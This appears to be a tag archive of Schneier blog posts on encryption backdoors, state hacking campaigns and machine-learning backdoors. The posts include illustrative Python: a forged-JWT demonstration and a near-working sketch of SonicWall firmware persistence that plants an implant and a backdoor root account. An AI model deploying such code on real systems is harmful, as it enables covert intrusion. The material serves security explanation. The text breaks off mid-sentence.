Tag Archives: backdoors

EU Court of Human Rights Rejects Encryption Backdoors

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2024/02/eu-court-of-human-rights-rejects-encryption-backdoors.html

The European Court of Human Rights has ruled that breaking end-to-end encryption by adding backdoors violates human rights:

Seemingly most critically, the [Russian] government told the ECHR that any intrusion on private lives resulting from decrypting messages was “necessary” to combat terrorism in a democratic society. To back up this claim, the government pointed to a 2017 terrorist attack that was “coordinated from abroad through secret chats via Telegram.” The government claimed that a second terrorist attack that year was prevented after the government discovered it was being coordinated through Telegram chats.

However, privacy advocates backed up Telegram’s claims that the messaging service couldn’t technically build a backdoor for governments without impacting all its users. They also argued that the threat of mass surveillance could be enough to infringe on human rights. The European Information Society Institute (EISI) and Privacy International told the ECHR that even if governments never used required disclosures to mass surveil citizens, it could have a chilling effect on users’ speech or prompt service providers to issue radical software updates weakening encryption for all users.

In the end, the ECHR concluded that the Telegram user’s rights had been violated, partly due to privacy advocates and international reports that corroborated Telegram’s position that complying with the FSB’s disclosure order would force changes impacting all its users.

The “confidentiality of communications is an essential element of the right to respect for private life and correspondence,” the ECHR’s ruling said. Thus, requiring messages to be decrypted by law enforcement “cannot be regarded as necessary in a democratic society.”

New iPhone Exploit Uses Four Zero-Days

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2024/01/new-iphone-exploit-uses-four-zero-days.html

Kaspersky researchers are detailing “an attack that over four years backdoored dozens if not thousands of iPhones, many of which belonged to employees of Moscow-based security firm Kaspersky.” It’s a zero-click exploit that makes use of four iPhone zero-days.

The most intriguing new detail is the targeting of the heretofore-unknown hardware feature, which proved to be pivotal to the Operation Triangulation campaign. A zero-day in the feature allowed the attackers to bypass advanced hardware-based memory protections designed to safeguard device system integrity even after an attacker gained the ability to tamper with memory of the underlying kernel. On most other platforms, once attackers successfully exploit a kernel vulnerability they have full control of the compromised system.

On Apple devices equipped with these protections, such attackers are still unable to perform key post-exploitation techniques such as injecting malicious code into other processes, or modifying kernel code or sensitive kernel data. This powerful protection was bypassed by exploiting a vulnerability in the secret function. The protection, which has rarely been defeated in exploits found to date, is also present in Apple’s M1 and M2 CPUs.

The details are staggering:

Here is a quick rundown of this 0-click iMessage attack, which used four zero-days and was designed to work on iOS versions up to iOS 16.2.

  • Attackers send a malicious iMessage attachment, which the application processes without showing any signs to the user.
  • This attachment exploits the remote code execution vulnerability CVE-2023-41990 in the undocumented, Apple-only ADJUST TrueType font instruction. This instruction had existed since the early nineties before a patch removed it.
  • It uses return/jump oriented programming and multiple stages written in the NSExpression/NSPredicate query language, patching the JavaScriptCore library environment to execute a privilege escalation exploit written in JavaScript.
  • This JavaScript exploit is obfuscated to make it completely unreadable and to minimize its size. Still, it has around 11,000 lines of code, which are mainly dedicated to JavaScriptCore and kernel memory parsing and manipulation.
  • It exploits the JavaScriptCore debugging feature DollarVM ($vm) to gain the ability to manipulate JavaScriptCore’s memory from the script and execute native API functions.
  • It was designed to support both old and new iPhones and included a Pointer Authentication Code (PAC) bypass for exploitation of recent models.
  • It uses the integer overflow vulnerability CVE-2023-32434 in XNU’s memory mapping syscalls (mach_make_memory_entry and vm_map) to obtain read/write access to the entire physical memory of the device at user level.
  • It uses hardware memory-mapped I/O (MMIO) registers to bypass the Page Protection Layer (PPL). This was mitigated as CVE-2023-38606.
  • After exploiting all the vulnerabilities, the JavaScript exploit can do whatever it wants to the device including running spyware, but the attackers chose to: (a) launch the IMAgent process and inject a payload that clears the exploitation artefacts from the device; (b) run a Safari process in invisible mode and forward it to a web page with the next stage.
  • The web page has a script that verifies the victim and, if the checks pass, receives the next stage: the Safari exploit.
  • The Safari exploit uses CVE-2023-32435 to execute a shellcode.
  • The shellcode executes another kernel exploit in the form of a Mach object file. It uses the same vulnerabilities: CVE-2023-32434 and CVE-2023-38606. It is also massive in terms of size and functionality, but completely different from the kernel exploit written in JavaScript. Certain parts related to exploitation of the above-mentioned vulnerabilities are all that the two share. Still, most of its code is also dedicated to parsing and manipulation of the kernel memory. It contains various post-exploitation utilities, which are mostly unused.
  • The exploit obtains root privileges and proceeds to execute other stages, which load spyware. We covered these stages in our previous posts.

This is nation-state stuff, absolutely crazy in its sophistication. Kaspersky discovered it, so there’s no speculation as to the attacker.

Bounty to Recover NIST’s Elliptic Curve Seeds

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/10/bounty-to-recover-nists-elliptic-curve-seeds.html

This is a fun challenge:

The NIST elliptic curves that power much of modern cryptography were generated in the late ’90s by hashing seeds provided by the NSA. How were the seeds generated? Rumor has it that they are in turn hashes of English sentences, but the person who picked them, Dr. Jerry Solinas, passed away in early 2023 leaving behind a cryptographic mystery, some conspiracy theories, and an historical password cracking challenge.

So there’s a $12K prize to recover the phrases behind the seeds.

Some backstory:

Some of the backstory here (it’s the funniest fucking backstory ever): it’s lately been circulating—though I think this may have been somewhat common knowledge among practitioners, though definitely not to me—that the “random” seeds for the NIST P-curves, generated in the 1990s by Jerry Solinas at NSA, were simply SHA1 hashes of some variation of the string “Give Jerry a raise”.

At the time, the “pass a string through SHA1” thing was meant to increase confidence in the curve seeds; the idea was that SHA1 would destroy any possible structure in the seed, so NSA couldn’t have selected a deliberately weak seed. Of course, NIST/NSA then set about destroying its reputation in the 2000’s, and this explanation wasn’t nearly enough to quell conspiracy theories.

But when Jerry Solinas went back to reconstruct the seeds, so NIST could demonstrate that the seeds really were benign, he found that he’d forgotten the string he used!

If you’re a true conspiracist, you’re certain nobody is going to find a string that generates any of these seeds. On the flip side, if anyone does find them, that’ll be a pretty devastating blow to the theory that the NIST P-curves were maliciously generated—even for people totally unfamiliar with basic curve math.
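
In practical terms, the challenge is ordinary password cracking against a known digest: hash candidate English phrases with SHA-1 and compare against the published seed. A minimal sketch, assuming the "seed = SHA-1(phrase)" generation story; the P-256 seed constant is the SEED value from FIPS 186 (verify against the standard), and the candidate phrases are purely hypothetical guesses:

```python
# Minimal sketch of the cracking task: seed = SHA-1(English phrase).
# The P-256 seed below is the SEED value published in FIPS 186 (verify
# against the standard); the candidate phrases are hypothetical guesses.
import hashlib

P256_SEED = bytes.fromhex("c49d360886e704936a6678e1139d26b7819f7e90")

def matches_p256(phrase: str) -> bool:
    """True if SHA-1 of the phrase equals the published P-256 curve seed."""
    return hashlib.sha1(phrase.encode("ascii")).digest() == P256_SEED

candidates = [
    "Give Jerry a raise",
    "Give Jerry a raise.",
    "GIVE JERRY A RAISE",
    "Jerry deserves a raise.",
]

for phrase in candidates:
    if matches_p256(phrase):
        print("Recovered the P-256 seed phrase:", phrase)
```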

Note that these are not the constants used in the Dual_EC_DRBG random-number generator that the NSA backdoored. This is something different.

Signal Will Leave the UK Rather Than Add a Backdoor

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/09/signal-will-leave-the-uk-rather-than-add-a-backdoor.html

Totally expected, but still good to hear:

Onstage at TechCrunch Disrupt 2023, Meredith Whittaker, the president of the Signal Foundation, which maintains the nonprofit Signal messaging app, reaffirmed that Signal would leave the U.K. if the country’s recently passed Online Safety Bill forced Signal to build “backdoors” into its end-to-end encryption.

“We would leave the U.K. or any jurisdiction if it came down to the choice between backdooring our encryption and betraying the people who count on us for privacy, or leaving,” Whittaker said. “And that’s never not true.”

New Revelations from the Snowden Documents

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/09/new-revelations-from-the-snowden-documents.html

Jake Appelbaum’s PhD thesis contains several new revelations from the classified NSA documents provided to journalists by Edward Snowden. Nothing major, but a few more tidbits.

Kind of amazing that it all happened ten years ago. At this point, those documents are more historical than anything else.

And it’s unclear who has those archives anymore. According to Appelbaum, The Intercept destroyed their copy.

I recently published an essay about my experiences ten years ago.

Microsoft Signing Key Stolen by Chinese

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/08/microsoft-signing-key-stolen-by-chinese.html

A bunch of networks, including US Government networks, have been hacked by the Chinese. The hackers used forged authentication tokens to access user email, using a stolen Microsoft account (MSA) consumer signing key. Congress wants answers. The phrase “negligent security practices” is being tossed about—and with good reason. Master signing keys are not supposed to be left around, waiting to be stolen.

Actually, two things went badly wrong here. The first is that Azure accepted an expired signing key, implying a vulnerability in whatever is supposed to check key validity. The second is that this key was supposed to remain in the system’s Hardware Security Module—and not be in software. This implies a really serious breach of good security practice. The fact that Microsoft has not been forthcoming about the details of what happened tells me that the details are really bad.

I believe this all traces back to SolarWinds. In addition to Russia inserting malware into a SolarWinds update, China used a different SolarWinds vulnerability to break into networks. We know that Russia accessed Microsoft source code in that attack. I have heard from informed government officials that China used their SolarWinds vulnerability to break into Microsoft and access source code, including Azure’s.

I think we are grossly underestimating the long-term results of the SolarWinds attacks. That backdoored update was downloaded by over 14,000 networks worldwide. Organizations patched their networks, but not before Russia—and others—used the vulnerability to enter those networks. And once someone is in a network, it’s really hard to be sure that you’ve kicked them out.

Sophisticated threat actors are realizing that stealing source code of infrastructure providers, and then combing that code for vulnerabilities, is an excellent way to break into organizations that use those infrastructure providers. Attackers like Russia and China—and presumably the US as well—are prioritizing going after those providers.

News articles.

EDITED TO ADD: Commentary:

This is from Microsoft’s explanation. The China attackers “acquired an inactive MSA consumer signing key and used it to forge authentication tokens for Azure AD enterprise and MSA consumer to access OWA and Outlook.com. All MSA keys active prior to the incident—including the actor-acquired MSA signing key—have been invalidated. Azure AD keys were not impacted. Though the key was intended only for MSA accounts, a validation issue allowed this key to be trusted for signing Azure AD tokens. The actor was able to obtain new access tokens by presenting one previously issued from this API due to a design flaw. This flaw in the GetAccessTokenForResourceAPI has since been fixed to only accept tokens issued from Azure AD or MSA respectively. The actor used these tokens to retrieve mail messages from the OWA API.”
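
To see why a stolen token-signing key is so damaging, consider a generic token flow. This is a hedged sketch using ordinary JWTs, not Microsoft's actual token format, claim names, or APIs: whoever holds the private key can mint tokens that verify perfectly for any identity.

```python
# A hedged sketch of why a stolen token-signing key is catastrophic, using a
# generic JWT flow (not Microsoft's actual token format, claims, or APIs):
# whoever holds the private key can mint tokens that verify for any identity.
import datetime

import jwt  # PyJWT
from cryptography.hazmat.primitives.asymmetric import rsa

# In the real incident, this key should have stayed inside an HSM.
stolen_private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
trusted_public_key = stolen_private_key.public_key()  # what relying services validate against

forged_token = jwt.encode(
    {
        "sub": "any-user@victim.example",      # hypothetical identity
        "aud": "https://mail.victim.example",  # hypothetical audience
        "exp": datetime.datetime.utcnow() + datetime.timedelta(hours=1),
    },
    stolen_private_key,
    algorithm="RS256",
)

# The relying service checks only the signature, so the forged token is
# indistinguishable from one issued legitimately.
claims = jwt.decode(
    forged_token,
    trusted_public_key,
    algorithms=["RS256"],
    audience="https://mail.victim.example",
)
print("Accepted forged token for:", claims["sub"])
```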

Backdoor in TETRA Police Radios

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/07/backdoor-in-tetra-police-radios.html

Seems that there is a deliberate backdoor in the decades-old TErrestrial Trunked RAdio (TETRA) standard used by police forces around the world.

The European Telecommunications Standards Institute (ETSI), an organization that standardizes technologies across the industry, first created TETRA in 1995. Since then, TETRA has been used in products, including radios, sold by Motorola, Airbus, and more. Crucially, TETRA is not open-source. Instead, it relies on what the researchers describe in their presentation slides as “secret, proprietary cryptography,” meaning it is typically difficult for outside experts to verify how secure the standard really is.

The researchers said they worked around this limitation by purchasing a TETRA-powered radio from eBay. In order to then access the cryptographic component of the radio itself, Wetzels said the team found a vulnerability in an interface of the radio.

[…]

Most interesting are the researchers’ findings of what they describe as the backdoor in TEA1. Ordinarily, radios using TEA1 used an 80-bit key. But Wetzels said the team found a “secret reduction step” which dramatically lowers the amount of entropy the initial key offered. An attacker who followed this step would then be able to decrypt intercepted traffic with consumer-level hardware and a cheap software-defined radio dongle.
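
A back-of-the-envelope sketch shows why the reduction matters. The quoted article doesn't give the reduced key size; public reporting on the research puts the effective TEA1 key space at roughly 32 bits, which I take as an assumption here:

```python
# Back-of-the-envelope cost of exhaustive key search, to show why a "secret
# reduction step" matters. The 32-bit figure is an assumption taken from
# public reporting on the research, not from the quoted article.
def exhaustive_search_seconds(effective_key_bits: int, keys_per_second: float) -> float:
    """Worst-case time to try every key in a space of 2**effective_key_bits."""
    return (2 ** effective_key_bits) / keys_per_second

RATE = 1e9  # roughly one billion key trials per second on commodity hardware (illustrative)

for bits in (80, 32):
    seconds = exhaustive_search_seconds(bits, RATE)
    print(f"{bits}-bit key space: about {seconds:.2e} seconds "
          f"({seconds / 3.15e7:.2e} years)")

# 80 bits: ~1.2e15 seconds, tens of millions of years, i.e. infeasible.
# 32 bits: a few seconds, i.e. trivially breakable with a laptop and an SDR capture.
```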

Looks like the encryption algorithm was intentionally weakened by intelligence agencies to facilitate easy eavesdropping.

Specifically on the researchers’ claims of a backdoor in TEA1, Boyer added “At this time, we would like to point out that the research findings do not relate to any backdoors. The TETRA security standards have been specified together with national security agencies and are designed for and subject to export control regulations which determine the strength of the encryption.”

And I would like to point out that that’s the very definition of a backdoor.

Why aren’t we done with secret, proprietary cryptography? It’s just not a good idea.

Details of the security analysis. Another news article.

Another Malware with Persistence

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/03/another-malware-with-persistence.html

Here’s a piece of Chinese malware that infects SonicWall security appliances and survives firmware updates.

On Thursday, security firm Mandiant published a report that said threat actors with a suspected nexus to China were engaged in a campaign to maintain long-term persistence by running malware on unpatched SonicWall SMA appliances. The campaign was notable for the ability of the malware to remain on the devices even after they received firmware updates.

“The attackers put significant effort into the stability and persistence of their tooling,” Mandiant researchers Daniel Lee, Stephen Eckels, and Ben Read wrote. “This allows their access to the network to persist through firmware updates and maintain a foothold on the network through the SonicWall Device.”

To achieve this persistence, the malware checks for available firmware upgrades every 10 seconds. When an update becomes available, the malware copies the archived file for backup, unzips it, mounts it, and then copies the entire package of malicious files to it. The malware also adds a backdoor root user to the mounted file. Then, the malware rezips the file so it’s ready for installation.

“The technique is not especially sophisticated, but it does show considerable effort on the part of the attacker to understand the appliance update cycle, then develop and test a method for persistence,” the researchers wrote.
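
Conceptually, the update-hijacking loop described above looks something like the following sketch. The paths, file layout, and helper names are hypothetical, and this is an illustration of the reported technique, not the actual malware:

```python
# Conceptual sketch of the persistence technique Mandiant describes: poll for
# a pending firmware update, inject the implant into the package, and repack
# it so the "update" reinstalls the malware. All paths and names here are
# hypothetical; the real malware mounts a firmware image rather than just
# unzipping an archive.
import shutil
import time
from pathlib import Path

UPDATE_ARCHIVE = Path("/cf/firmware/pending_update.zip")  # hypothetical location
IMPLANT_DIR = Path("/tmp/implant_files")                  # hypothetical payload directory

def repack_with_implant(archive: Path) -> None:
    """Unpack the pending update, copy the implant in, add a root user, repack."""
    work = Path("/tmp/fw_work")
    shutil.rmtree(work, ignore_errors=True)
    shutil.unpack_archive(str(archive), str(work))
    shutil.copytree(IMPLANT_DIR, work / "implant", dirs_exist_ok=True)
    (work / "etc").mkdir(parents=True, exist_ok=True)
    with open(work / "etc" / "passwd", "a") as f:          # the reported backdoor root user
        f.write("backup:x:0:0::/root:/bin/sh\n")
    shutil.make_archive(str(archive.with_suffix("")), "zip", str(work))

last_seen = None
while True:
    if UPDATE_ARCHIVE.exists():
        mtime = UPDATE_ARCHIVE.stat().st_mtime
        if mtime != last_seen:                              # only touch a new update once
            shutil.copy(UPDATE_ARCHIVE, UPDATE_ARCHIVE.with_suffix(".bak"))  # keep a backup
            repack_with_implant(UPDATE_ARCHIVE)
            last_seen = UPDATE_ARCHIVE.stat().st_mtime
    time.sleep(10)  # the malware reportedly checks every 10 seconds
```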

Putting Undetectable Backdoors in Machine Learning Models

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/02/putting-undetectable-backdoors-in-machine-learning-models.html

This is really interesting research from a few months ago:

Abstract: Given the computational cost and technical expertise required to train machine learning models, users may delegate the task of learning to a service provider. Delegation of learning has clear benefits, and at the same time raises serious concerns of trust. This work studies possible abuses of power by untrusted learners. We show how a malicious learner can plant an undetectable backdoor into a classifier. On the surface, such a backdoored classifier behaves normally, but in reality, the learner maintains a mechanism for changing the classification of any input, with only a slight perturbation. Importantly, without the appropriate “backdoor key,” the mechanism is hidden and cannot be detected by any computationally-bounded observer. We demonstrate two frameworks for planting undetectable backdoors, with incomparable guarantees.

First, we show how to plant a backdoor in any model, using digital signature schemes. The construction guarantees that given query access to the original model and the backdoored version, it is computationally infeasible to find even a single input where they differ. This property implies that the backdoored model has generalization error comparable with the original model. Moreover, even if the distinguisher can request backdoored inputs of its choice, they cannot backdoor a new input, a property we call non-replicability.

Second, we demonstrate how to insert undetectable backdoors in models trained using the Random Fourier Features (RFF) learning paradigm (Rahimi, Recht; NeurIPS 2007). In this construction, undetectability holds against powerful white-box distinguishers: given a complete description of the network and the training data, no efficient distinguisher can guess whether the model is “clean” or contains a backdoor. The backdooring algorithm executes the RFF algorithm faithfully on the given training data, tampering only with its random coins. We prove this strong guarantee under the hardness of the Continuous Learning With Errors problem (Bruna, Regev, Song, Tang; STOC 2021). We show a similar white-box undetectable backdoor for random ReLU networks based on the hardness of Sparse PCA (Berthet, Rigollet; COLT 2013).

Our construction of undetectable backdoors also sheds light on the related issue of robustness to adversarial examples. In particular, by constructing an undetectable backdoor for an “adversarially-robust” learning algorithm, we can produce a classifier that is indistinguishable from a robust classifier, but where every input has an adversarial example! In this way, the existence of undetectable backdoors represents a significant theoretical roadblock to certifying adversarial robustness.
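
To make the signature-scheme idea concrete, here is a toy sketch of my own, not the paper's actual construction: the deployed model embeds only a public verification key, so anyone can inspect it, but only the holder of the private signing key can craft inputs that trigger the backdoor.

```python
# A toy illustration of the digital-signature idea (my sketch, not the paper's
# construction). The deployed model contains only the public key; without the
# private key, no efficient observer can find an input where the backdoored
# model and the honest model disagree, yet the key holder can flip any input's
# label by attaching a valid signature.
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

private_key = Ed25519PrivateKey.generate()   # held only by the malicious learner
public_key = private_key.public_key()        # baked into the deployed classifier

def honest_model(features: bytes) -> int:
    """Stand-in for any ordinary classifier."""
    return sum(features) % 2

def backdoored_model(features: bytes, tag: bytes) -> int:
    """Identical to honest_model unless `tag` is a valid signature on `features`."""
    try:
        public_key.verify(tag, features)
        return 1                              # attacker-chosen output
    except InvalidSignature:
        return honest_model(features)

x = bytes([3, 1, 4, 1, 5, 9])
assert backdoored_model(x, b"\x00" * 64) == honest_model(x)   # agrees on normal inputs
assert backdoored_model(x, private_key.sign(x)) == 1          # key holder triggers the backdoor
```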

Turns out that securing ML systems is really hard.

Manipulating Weights in Face-Recognition AI Systems

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/02/manipulating-weights-in-face-recognition-ai-systems.html

Interesting research: “Facial Misrecognition Systems: Simple Weight Manipulations Force DNNs to Err Only on Specific Persons”:

Abstract: In this paper we describe how to plant novel types of backdoors in any facial recognition model based on the popular architecture of deep Siamese neural networks, by mathematically changing a small fraction of its weights (i.e., without using any additional training or optimization). These backdoors force the system to err only on specific persons which are preselected by the attacker. For example, we show how such a backdoored system can take any two images of a particular person and decide that they represent different persons (an anonymity attack), or take any two images of a particular pair of persons and decide that they represent the same person (a confusion attack), with almost no effect on the correctness of its decisions for other persons. Uniquely, we show that multiple backdoors can be independently installed by multiple attackers who may not be aware of each other’s existence with almost no interference.

We have experimentally verified the attacks on a FaceNet-based facial recognition system, which achieves SOTA accuracy on the standard LFW dataset of 99.35%. When we tried to individually anonymize ten celebrities, the network failed to recognize two of their images as being the same person in 96.97% to 98.29% of the time. When we tried to confuse between the extremely different looking Morgan Freeman and Scarlett Johansson, for example, their images were declared to be the same person in 91.51% of the time. For each type of backdoor, we sequentially installed multiple backdoors with minimal effect on the performance of each one (for example, anonymizing all ten celebrities on the same model reduced the success rate for each celebrity by no more than 0.91%). In all of our experiments, the benign accuracy of the network on other persons was degraded by no more than 0.48% (and in most cases, it remained above 99.30%).

It’s a weird attack. On the one hand, the attacker has access to the internals of the facial recognition system. On the other hand, this is a novel attack in that it manipulates internal weights to achieve a specific outcome. Given that we have no idea how those weights work, it’s an important result.

Trojaned Windows Installer Targets Ukraine

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/12/trojaned-windows-installer-targets-ukraine.html

Mandiant is reporting on a trojaned Windows installer that targets Ukrainian users. The installer was left on various torrent sites, presumably ensnaring people downloading pirated copies of the operating system:

Mandiant uncovered a socially engineered supply chain operation focused on Ukrainian government entities that leveraged trojanized ISO files masquerading as legitimate Windows 10 Operating System installers. The trojanized ISOs were hosted on Ukrainian- and Russian-language torrent file sharing sites. Upon installation of the compromised software, the malware gathers information on the compromised system and exfiltrates it. At a subset of victims, additional tools are deployed to enable further intelligence gathering. In some instances, we discovered additional payloads that were likely deployed following initial reconnaissance including the STOWAWAY, BEACON, and SPAREPART backdoors.

One obvious solution would be for Microsoft to give the Ukrainians Windows licenses, so they don’t have to get their software from sketchy torrent sites.

Inserting a Backdoor into a Machine-Learning System

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/10/inserting-a-backdoor-into-a-machine-learning-system.html

Interesting research: “ImpNet: Imperceptible and blackbox-undetectable backdoors in compiled neural networks,” by Tim Clifford, Ilia Shumailov, Yiren Zhao, Ross Anderson, and Robert Mullins:

Abstract: Early backdoor attacks against machine learning set off an arms race in attack and defence development. Defences have since appeared demonstrating some ability to detect backdoors in models or even remove them. These defences work by inspecting the training data, the model, or the integrity of the training procedure. In this work, we show that backdoors can be added during compilation, circumventing any safeguards in the data preparation and model training stages. As an illustration, the attacker can insert weight-based backdoors during the hardware compilation step that will not be detected by any training or data-preparation process. Next, we demonstrate that some backdoors, such as ImpNet, can only be reliably detected at the stage where they are inserted and removing them anywhere else presents a significant challenge. We conclude that machine-learning model security requires assurance of provenance along the entire technical pipeline, including the data, model architecture, compiler, and hardware specification.

Ross Anderson explains the significance:

The trick is for the compiler to recognise what sort of model it’s compiling—whether it’s processing images or text, for example—and then devising trigger mechanisms for such models that are sufficiently covert and general. The takeaway message is that for a machine-learning model to be trustworthy, you need to assure the provenance of the whole chain: the model itself, the software tools used to compile it, the training data, the order in which the data are batched and presented—in short, everything.

Symbiote Backdoor in Linux

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/06/symbiote-backdoor-in-linux.html

Interesting:

What makes Symbiote different from other Linux malware that we usually come across, is that it needs to infect other running processes to inflict damage on infected machines. Instead of being a standalone executable file that is run to infect a machine, it is a shared object (SO) library that is loaded into all running processes using LD_PRELOAD (T1574.006), and parasitically infects the machine. Once it has infected all the running processes, it provides the threat actor with rootkit functionality, the ability to harvest credentials, and remote access capability.

News article:

Researchers have unearthed a discovery that doesn’t occur all that often in the realm of malware: a mature, never-before-seen Linux backdoor that uses novel evasion techniques to conceal its presence on infected servers, in some cases even with a forensic investigation.

No public attribution yet.

So far, there’s no evidence of infections in the wild, only malware samples found online. It’s unlikely this malware is widely active at the moment, but with stealth this robust, how can we be sure?

New Sophisticated Malware

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/05/new-sophisticated-malware.html

Mandiant is reporting on a new botnet.

The group, which security firm Mandiant is calling UNC3524, has spent the past 18 months burrowing into victims’ networks with unusual stealth. In cases where the group is ejected, it wastes no time reinfecting the victim environment and picking up where things left off. There are many keys to its stealth, including:

  • The use of a unique backdoor Mandiant calls Quietexit, which runs on load balancers, wireless access point controllers, and other types of IoT devices that don’t support antivirus or endpoint detection. This makes detection through traditional means difficult.
  • Customized versions of the backdoor that use file names and creation dates that are similar to legitimate files used on a specific infected device.
  • A live-off-the-land approach that favors common Windows programming interfaces and tools over custom code with the goal of leaving as light a footprint as possible.
  • An unusual way a second-stage backdoor connects to attacker-controlled infrastructure by, in essence, acting as a TLS-encrypted server that proxies data through the SOCKS protocol.

[…]

Unpacking this threat group is difficult. From outward appearances, their focus on corporate transactions suggests a financial interest. But UNC3524’s high-caliber tradecraft, proficiency with sophisticated IoT botnets, and ability to remain undetected for so long suggests something more.

From Mandiant:

Throughout their operations, the threat actor demonstrated sophisticated operational security that we see only a small number of threat actors demonstrate. The threat actor evaded detection by operating from devices in the victim environment’s blind spots, including servers running uncommon versions of Linux and network appliances running opaque OSes. These devices and appliances were running versions of operating systems that were unsupported by agent-based security tools, and often had an expected level of network traffic that allowed the attackers to blend in. The threat actor’s use of the QUIETEXIT tunneler allowed them to largely live off the land, without the need to bring in additional tools, further reducing the opportunity for detection. This allowed UNC3524 to remain undetected in victim environments for, in some cases, upwards of 18 months.

Undetectable Backdoors in Machine-Learning Models

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/04/undetectable-backdoors-in-machine-learning-models.html

New paper: “Planting Undetectable Backdoors in Machine Learning Models”:

Abstract: Given the computational cost and technical expertise required to train machine learning models, users may delegate the task of learning to a service provider. We show how a malicious learner can plant an undetectable backdoor into a classifier. On the surface, such a backdoored classifier behaves normally, but in reality, the learner maintains a mechanism for changing the classification of any input, with only a slight perturbation. Importantly, without the appropriate “backdoor key”, the mechanism is hidden and cannot be detected by any computationally-bounded observer. We demonstrate two frameworks for planting undetectable backdoors, with incomparable guarantees.

First, we show how to plant a backdoor in any model, using digital signature schemes. The construction guarantees that given black-box access to the original model and the backdoored version, it is computationally infeasible to find even a single input where they differ. This property implies that the backdoored model has generalization error comparable with the original model. Second, we demonstrate how to insert undetectable backdoors in models trained using the Random Fourier Features (RFF) learning paradigm or in Random ReLU networks. In this construction, undetectability holds against powerful white-box distinguishers: given a complete description of the network and the training data, no efficient distinguisher can guess whether the model is “clean” or contains a backdoor.

Our construction of undetectable backdoors also sheds light on the related issue of robustness to adversarial examples. In particular, our construction can produce a classifier that is indistinguishable from an “adversarially robust” classifier, but where every input has an adversarial example! In summary, the existence of undetectable backdoors represents a significant theoretical roadblock to certifying adversarial robustness.

EDITED TO ADD (4/20): Cory Doctorow wrote about this as well.

New German Government is Pro-Encryption and Anti-Backdoors

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2021/12/new-german-government-is-pro-encryption-and-anti-backdoors.html

I hope this is true:

According to Jens Zimmermann, the German coalition negotiations had made it “quite clear” that the incoming government of the Social Democrats (SPD), the Greens and the business-friendly liberal FDP would reject “the weakening of encryption, which is being attempted under the guise of the fight against child abuse” by the coalition partners.

Such regulations, which are already enshrined in the interim solution of the ePrivacy Regulation, for example, “diametrically contradict the character of the coalition agreement” because secure end-to-end encryption is guaranteed there, Zimmermann said.

Introducing backdoors would undermine this goal of the coalition agreement, he added.

I have written about this.

Security Risks of Client-Side Scanning

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2021/10/security-risks-of-client-side-scanning.html

Even before Apple made its announcement, law enforcement shifted their battle for backdoors to client-side scanning. The idea is that they wouldn’t touch the cryptography, but instead eavesdrop on communications and systems before encryption or after decryption. It’s not a cryptographic backdoor, but it’s still a backdoor — and brings with it all the insecurities of a backdoor.

I’m part of a group of cryptographers that has just published a paper discussing the security risks of such a system. (It’s substantially the same group that wrote a similar paper about key escrow in 1997, and other “exceptional access” proposals in 2015. We seem to have to do this every decade or so.) In our paper, we examine both the efficacy of such a system and its potential security failures, and conclude that it’s a really bad idea.

We had been working on the paper well before Apple’s announcement. And while we do talk about Apple’s system, our focus is really on the idea in general.

Ross Anderson wrote a blog post on the paper. (It’s always great when Ross writes something. It means I don’t have to.) So did Susan Landau. And there’s press coverage in the New York Times, the Guardian, Computer Weekly, the Financial Times, Forbes, El Pais (English translation), NRK (English translation), and — this is the best article of them all — the Register. See also this analysis of the law and politics of client-side scanning from last year.

More on Apple’s iPhone Backdoor

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2021/08/more-on-apples-iphone-backdoor.html

In this post, I’ll collect links on Apple’s iPhone backdoor for scanning CSAM images. Previous links are here and here.

Apple says that hash collisions in its CSAM detection system were expected, and not a concern. I’m not convinced that this secondary system was originally part of the design, since it wasn’t discussed in the original specification.

Good op-ed from a group of Princeton researchers who developed a similar system:

Our system could be easily repurposed for surveillance and censorship. The design wasn’t restricted to a specific category of content; a service could simply swap in any content-matching database, and the person using that service would be none the wiser.

EDITED TO ADD (8/30): Good essays by Matthew Green and Alex Stamos, Ross Anderson, Edward Snowden, and Susan Landau. And also Kurt Opsahl.

Apple’s NeuralHash Algorithm Has Been Reverse-Engineered

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2021/08/apples-neuralhash-algorithm-has-been-reverse-engineered.html

Apple’s NeuralHash algorithm — the one it’s using for client-side scanning on the iPhone — has been reverse-engineered.

Turns out it was already in iOS 14.3, and someone noticed:

Early tests show that it can tolerate image resizing and compression, but not cropping or rotations.

We also have the first collision: two images that hash to the same value.

The next step is to generate innocuous images that NeuralHash classifies as prohibited content.
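
NeuralHash itself is a neural-network-based perceptual hash, but the behavior described above (tolerating resizing and compression while breaking under cropping or rotation) is characteristic of perceptual hashes generally. A much simpler "average hash" sketch, which is not Apple's algorithm, illustrates the idea:

```python
# A simple "average hash", shown only to illustrate what a perceptual hash is;
# NeuralHash is a far more elaborate, neural-network-based construction. Small
# transformations (resizing, mild compression) barely change the hash, while
# cropping or rotation flips many bits.
from PIL import Image

def average_hash(path: str, size: int = 8) -> int:
    """Downscale to size x size grayscale, threshold at the mean, pack into bits."""
    img = Image.open(path).convert("L").resize((size, size))
    pixels = list(img.getdata())
    mean = sum(pixels) / len(pixels)
    bits = 0
    for p in pixels:
        bits = (bits << 1) | (1 if p >= mean else 0)
    return bits

def hamming_distance(a: int, b: int) -> int:
    """Number of differing bits between two hashes."""
    return bin(a ^ b).count("1")

# Usage with hypothetical file names: a resized copy should land at a distance
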